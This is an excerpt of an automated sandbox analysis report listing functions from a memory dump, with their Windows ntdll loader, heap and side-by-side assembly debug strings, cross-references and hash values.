String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 233fe4c83f4f4defaa821b588ac9e3a0d32a2d604be51bdb3238f0ff81233670
Instruction ID: 570b2dddbba2a654a1693235c9ea6730afe6285be482f896a1297d93d9a41561
Opcode Fuzzy Hash: 233fe4c83f4f4defaa821b588ac9e3a0d32a2d604be51bdb3238f0ff81233670
Instruction Fuzzy Hash: CF024EB1D042299BDB75DF14CC80BDEB7B8AF55714F0041EAE689A7241DB30AE84CF69

Function 01030E50 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

!, xrefs: 01030EC6
%%%u!%s!, xrefs: 010712AB
w, xrefs: 01030EDA
, xrefs: 01030F0C
l, xrefs: 01030EE4
9, xrefs: 01030EBC
0, xrefs: 01030EB2
%, xrefs: 01030E9E
h, xrefs: 01030ED0
%%%u, xrefs: 010712D6

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: bd50534fdaa01d4fe0563d0a0f5b0abeb079131b28d5be88b89c7135ae70ec6f
Instruction ID: a38f410fdb4ed830764c79f2f3a5608bfca0d710544f2f1e9180dfa17abcb633
Opcode Fuzzy Hash: bd50534fdaa01d4fe0563d0a0f5b0abeb079131b28d5be88b89c7135ae70ec6f
Instruction Fuzzy Hash: A8628FB5E002298FDB64CF18C8417A9B7F6AFC5310F1482DAE589AB280D7725AE1CF54

Function 010A86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

services.exe, xrefs: 010A8716
heapType, xrefs: 010A874B
lsass.exe, xrefs: 010A8721
smss.exe, xrefs: 010A870B
runtimebroker.exe, xrefs: 010A86F3
csrss.exe, xrefs: 010A8700
SegmentHeap, xrefs: 010A8769
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 010A8750
svchost.exe, xrefs: 010A86E8
DefaultBrowser_NOPUBLISHERID, xrefs: 010A8880

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: e4f205f32d86aaead8e098535a56124a4941d010e1ae89ed6ba3fa1932057aff
Instruction ID: c1343accbe7dc6d326549160271a254d6556a2ddf302ca818b19fadc17e976b2
Opcode Fuzzy Hash: e4f205f32d86aaead8e098535a56124a4941d010e1ae89ed6ba3fa1932057aff
Instruction Fuzzy Hash: DB51C0715083119BD325DF589844BABBBE9FB84750F44891FFAD9C7281EB70D604C792

Function 00FF640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 00FF651C

Part of subcall function 00FF6565: RtlDebugPrintTimes.NTDLL ref: 00FF6614
Part of subcall function 00FF6565: RtlDebugPrintTimes.NTDLL ref: 00FF665F

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010597B9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01059790
minkernel\ntdll\ldrinit.c, xrefs: 010597A0, 010597C9
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0105977C
apphelp.dll, xrefs: 00FF6446
LdrpInitShimEngine, xrefs: 01059783, 01059796, 010597BF

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 557d01bb0f0fa3e9e8d3bd1c603eef375f8952e4749ed1eb7817164016dfae0c
Instruction ID: b8b9b1c07033ead6119146140f63c00ee3246a1502b3f36f9f8afcc35fc4109d
Opcode Fuzzy Hash: 557d01bb0f0fa3e9e8d3bd1c603eef375f8952e4749ed1eb7817164016dfae0c
Instruction Fuzzy Hash: E351AE712483089FE360DF24C892AAB77E8FF84758F04051EFAD5975A1EB35E904DB92

Function 010B0E6D Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p is not last block in segment (%p), xrefs: 010B1337
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 010B13EB
Free Heap block %p modified at %p after it was freed, xrefs: 010B129B
HEAP: , xrefs: 010B1286, 010B12D6, 010B1328, 010B1389, 010B13CD, 010B1415, 010B1466
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 010B1425
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 010B12ED
HEAP[%wZ]: , xrefs: 010B124D, 010B1279, 010B12C9, 010B131B, 010B137C, 010B13C0, 010B1459
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 010B1478
Heap block at %p has incorrect segment offset (%x), xrefs: 010B139A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 93806d79870f70a9df260199871ad3cbb31414d0e8a386615b3ed0fa4b1e3425
Instruction ID: d4ea3224bde66484367a9088c5f74fdefabf954a3c6ac8ef93f29c3c296e5b93
Opcode Fuzzy Hash: 93806d79870f70a9df260199871ad3cbb31414d0e8a386615b3ed0fa4b1e3425
Instruction Fuzzy Hash: 7E12CE30600646AFD725CF28D4A5BFABBF1FF09700F088499E5C68B692D778E881DB50

Function 0101AC20 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

DLL name: %wZ, xrefs: 01067E82
LdrpFindLoadedDllInternal, xrefs: 010680E4
LdrpInitializeDllPath, xrefs: 01067EBA
LdrGetDllHandleEx, xrefs: 01067E89, 010681BF
minkernel\ntdll\ldrapi.c, xrefs: 01067E93, 010681C9
Status: 0x%08lx, xrefs: 010680DD, 010681B8
minkernel\ntdll\ldrfind.c, xrefs: 010680EE
DLL search path passed in externally: %ws, xrefs: 01067EB3
minkernel\ntdll\ldrutil.c, xrefs: 01067EC4

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: b325bdc1ea2f1f88c79a5844a4f0fb3c69f5e8a0a5d73d443b05b70e7ed803e4
Instruction ID: eb58271e31bc89d775d0f150130c9d0de8cf4ea6664cfafc896887a3f080d139
Opcode Fuzzy Hash: b325bdc1ea2f1f88c79a5844a4f0fb3c69f5e8a0a5d73d443b05b70e7ed803e4
Instruction Fuzzy Hash: 1912F27170A382CBD725DF28C880BAAB7E5BF84704F04495EF9C58B285E739D944CB92

Function 00FFD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 00FFD389
@, xrefs: 00FFD43D
Control Panel\Desktop\MuiCached, xrefs: 00FFD5CB
PreferredUILanguagesPending, xrefs: 0105A66D
MachinePreferredUILanguages, xrefs: 00FFD625
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00FFD356
PreferredUILanguages, xrefs: 00FFD458, 00FFD465
Control Panel\Desktop, xrefs: 00FFD3FD
@, xrefs: 00FFD603

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 22549123496a291f8ecac2b3dcac7a46f5150b43a22ebf80c1e2b229b25da65f
Instruction ID: 5ba505c63b8e909396af63340185ab1dfa6de6689f5e137ed374334de9950b32
Opcode Fuzzy Hash: 22549123496a291f8ecac2b3dcac7a46f5150b43a22ebf80c1e2b229b25da65f
Instruction Fuzzy Hash: 51B1A0729083559FC761DF18C480B6FBBE9AF88714F08492EFA85D7250D770D9089B92

Function 01098D0A Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

AppContainerNamedObjects, xrefs: 01098FFF, 01099067
Global\Session\%ld%s, xrefs: 01099056
\AppContainerNamedObjects, xrefs: 0109903C, 0109904A
%s\%ld\%s, xrefs: 0109901E
%s\%u-%u-%u-%u, xrefs: 01098FB3
BaseNamedObjects, xrefs: 01099008, 0109900D
\BaseNamedObjects, xrefs: 0109902F
\Sessions, xrefs: 01099019

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 2994545307-3063724069
Opcode ID: d1ee62acceead2e1440c133197d5419c128aad6774567d049a3bbf3f98342e4b
Instruction ID: 209e33a09f557e1b30785a77aae35d9074d02a8a9bb99f15462eed71991e5e50
Opcode Fuzzy Hash: d1ee62acceead2e1440c133197d5419c128aad6774567d049a3bbf3f98342e4b
Instruction Fuzzy Hash: 69D126B2808356AFDB21DA54C8A4BAFBBE8BF84718F04096DFAC497140E775DD049792

Function 01088633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDlls, xrefs: 0108893D
AVRF: -*- final list of providers -*- , xrefs: 0108880F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010886E7
VerifierDebug, xrefs: 01088925
VerifierFlags, xrefs: 010888D0
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010886BD
HandleTraces, xrefs: 0108890F

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 07a2224b8536a80d11830652c7b54bdc1f6381f220b9de7a9e9bd4795b9934d9
Instruction ID: f14e7b70f20b2d940b69b681a99dddec72e2604ce7ce443f8f00bbd454d3ade6
Opcode Fuzzy Hash: 07a2224b8536a80d11830652c7b54bdc1f6381f220b9de7a9e9bd4795b9934d9
Instruction Fuzzy Hash: 0D912531608712DFD321FF289C81B6ABBE8AB45714F89855EFAC06B681C735E804C792

Function 01034C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01034C84

Strings

LdrpFindDllActivationContext, xrefs: 01073440, 0107346C
minkernel\ntdll\ldrsnap.c, xrefs: 0107344A, 01073476
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01073439
Querying the active activation context failed with status 0x%08lx, xrefs: 01073466

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 4eeaf71efc7f01e2c0fcb07f24634bfbbbea2ce40da35665415949b34e4a8220
Instruction ID: f29c1b2f8d93739c112d595f5cc9f40a06c1f2c3f35968fcbe197d51389f981b
Opcode Fuzzy Hash: 4eeaf71efc7f01e2c0fcb07f24634bfbbbea2ce40da35665415949b34e4a8220
Instruction Fuzzy Hash: EA312C72E20359AFEBF29B0CC849A69B6ECFB80754F0681AAD5C0DF151D761DD80C791

Function 0102237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0106A7A5
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0106A79F
minkernel\ntdll\ldrinit.c, xrefs: 0106A7AF
apphelp.dll, xrefs: 01022382

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 6f8f67d3008e9a97303fed58e73723620a69c911e9d91f930b46934eae7e78b7
Instruction ID: 22ba931b412f74d3883b434cc71b60eeeec302df6a750a59aa69467c346e121f
Opcode Fuzzy Hash: 6f8f67d3008e9a97303fed58e73723620a69c911e9d91f930b46934eae7e78b7
Instruction Fuzzy Hash: A5314A72B00201EFEB71AF59D886AAD77F8FB80B10F14405DE9C17B685DB799942C750

Function 01084A57 Relevance: 8.8, Strings: 7, Instructions: 86COMMON

Download Yara Rule

Strings

Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01084AB8
***Exception thrown within loader***, xrefs: 01084AA7
LdrpProtectedCopyMemory, xrefs: 01084A74
Execute '.cxr %p' to dump context, xrefs: 01084B31
LdrpGenericExceptionFilter, xrefs: 01084A7C
minkernel\ntdll\ldrutil.c, xrefs: 01084A86
Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01084A75

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
API String ID: 0-2973941816
Opcode ID: 8686780eb4857a83d5b7303c3ed19afe550d4dd638a812ceadca1e5837a43d2f
Instruction ID: bf8d90708da1fd50f35a525732f44169218319a661e33bdb1132fd3d4a0a1fe0
Opcode Fuzzy Hash: 8686780eb4857a83d5b7303c3ed19afe550d4dd638a812ceadca1e5837a43d2f
Instruction Fuzzy Hash: 072176762081472BE328BA6ECC49F3ABB99FB41A60B140551F2E1DB581C258EA00C216

Function 0100E9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Exit, xrefs: 0100EA8C
T, xrefs: 0100EA6E
, xrefs: 0100F1B9
{, xrefs: 01064447
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0100EA78
R, xrefs: 0100EA82

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 29bfa96992bcd4ff2ed5f15bad9e75bb96d3bbc97e84d0927aef32e0b5e8c9ea
Instruction ID: 40f4973737cbf18daa81f4dbbb633c570c2162d78d2bf4830dc35dea3a25fe06
Opcode Fuzzy Hash: 29bfa96992bcd4ff2ed5f15bad9e75bb96d3bbc97e84d0927aef32e0b5e8c9ea
Instruction Fuzzy Hash: 62A22974A0562ACFEB75DF18CC987ADB7B5AF48304F1442E9D989A7290DB319E81CF40

Function 00FFF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(UCRBlock != NULL), xrefs: 0105DCFE
HEAP: , xrefs: 0105DCF3, 0105DE37, 0105E015, 0105E12D
(LONG)FreeEntry->Size > 1, xrefs: 0105E020
((LONG)FreeEntry->Size > 1), xrefs: 0105DE42
HEAP[%wZ]: , xrefs: 0105DCE6, 0105DE2A, 0105E008, 0105E120
(!TrailingUCR), xrefs: 0105E138

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: b5e402acde523473260165d95fa00c9db35334a45a04953a26737fdd2144c5a8
Instruction ID: 8909617157f448d903cca04a110eb6394ab9dcfdd52ef6c4037444f2eabd250c
Opcode Fuzzy Hash: b5e402acde523473260165d95fa00c9db35334a45a04953a26737fdd2144c5a8
Instruction Fuzzy Hash: D642FC312082468FC755DF28C880B7BBBE5FF84704F1849AAFAC58B262D774D949DB52

Function 0100AD00 Relevance: 8.1, Strings: 6, Instructions: 573COMMON

Download Yara Rule

Strings

J, xrefs: 0100ADCE
MUI, xrefs: 0100B330
LdrpResSearchResourceMappedFile Enter, xrefs: 0100ADD8
H, xrefs: 0100ADE2
#, xrefs: 01063444
LdrpResSearchResourceMappedFile Exit, xrefs: 0100ADEC

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-4098886588
Opcode ID: 64c6554881f1a0507d4178d22a3c04ae2e96fc2dbb3e9a4af21f9cce59fbd770
Instruction ID: b10865b24a16985dd2cb26c3dd34185bf3fdf6d5edc3894e3e85db69b245234b
Opcode Fuzzy Hash: 64c6554881f1a0507d4178d22a3c04ae2e96fc2dbb3e9a4af21f9cce59fbd770
Instruction Fuzzy Hash: D7329375A04269CBEB63CB18CC54BEEBBB9BF45340F1441E9E489AB291D7719E81CF40

Function 0101B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 010682DD
LdrpPreprocessDllName, xrefs: 01068210, 010682E4
DLL %wZ was redirected to %wZ by %s, xrefs: 01068209
API set, xrefs: 01068201, 01068206
SxS, xrefs: 010681FA
minkernel\ntdll\ldrutil.c, xrefs: 0106821A, 010682EE

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: dd1388bca05138a63bc867ef9388eac85e0add79c7744f223edabf08d3f2123e
Instruction ID: 4d73db034b00a7764073bd4f64fd319cd51af65b16b7479334d332093cc482cf
Opcode Fuzzy Hash: dd1388bca05138a63bc867ef9388eac85e0add79c7744f223edabf08d3f2123e
Instruction Fuzzy Hash: 19C14C71A003169BDB259B68C891BFEBBB5BF45700F1480AAEDC2DB299D778DD44C390

Function 0103631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01073F45
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01074009
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01073EE3
_LdrpInitialize, xrefs: 01073EEA, 01073F4C, 01074010, 0107406A
minkernel\ntdll\ldrinit.c, xrefs: 01073EF4, 01073F56, 0107401A, 01074074
Delaying execution failed with status 0x%08lx, xrefs: 01074063

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 70dbbf88f9fb9fa1978ff173816205d3a11ffa0d3dc3799d3ecaad7198a7bcf6
Instruction ID: 0633004d8c74e9e1b2631ddb71c2b6e2f4b230bedfd420ad79bec500cfc12cc2
Opcode Fuzzy Hash: 70dbbf88f9fb9fa1978ff173816205d3a11ffa0d3dc3799d3ecaad7198a7bcf6
Instruction Fuzzy Hash: 38915770F01355ABEB35DF18C84ABAE7BA9BB80760F04406CE6C1AF6C1DB769801C795

Function 01032C10 Relevance: 7.7, Strings: 6, Instructions: 218COMMON

Download Yara Rule

Strings

.Local\, xrefs: 01032CB1
@, xrefs: 01032D6D
SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 010725A6
SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 01072579
SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 01072510
\WinSxS\, xrefs: 01032D43

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
API String ID: 0-3926108909
Opcode ID: 8756ec3bca4989af7b978c7a393db3365d73f8808fbfe3805ea7d322e37c915c
Instruction ID: a8ee3b0efe1f5c1e57f3ef232b12165a7f77889389364c3387be5e15d03a8c26
Opcode Fuzzy Hash: 8756ec3bca4989af7b978c7a393db3365d73f8808fbfe3805ea7d322e37c915c
Instruction Fuzzy Hash: 0781EDB15083469FD721DF58C880A6BBBE8BFD5710F0489AEF8C58B251D770D984CBA2

Function 01032594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01071F6A, 01071FA4, 01071FC4
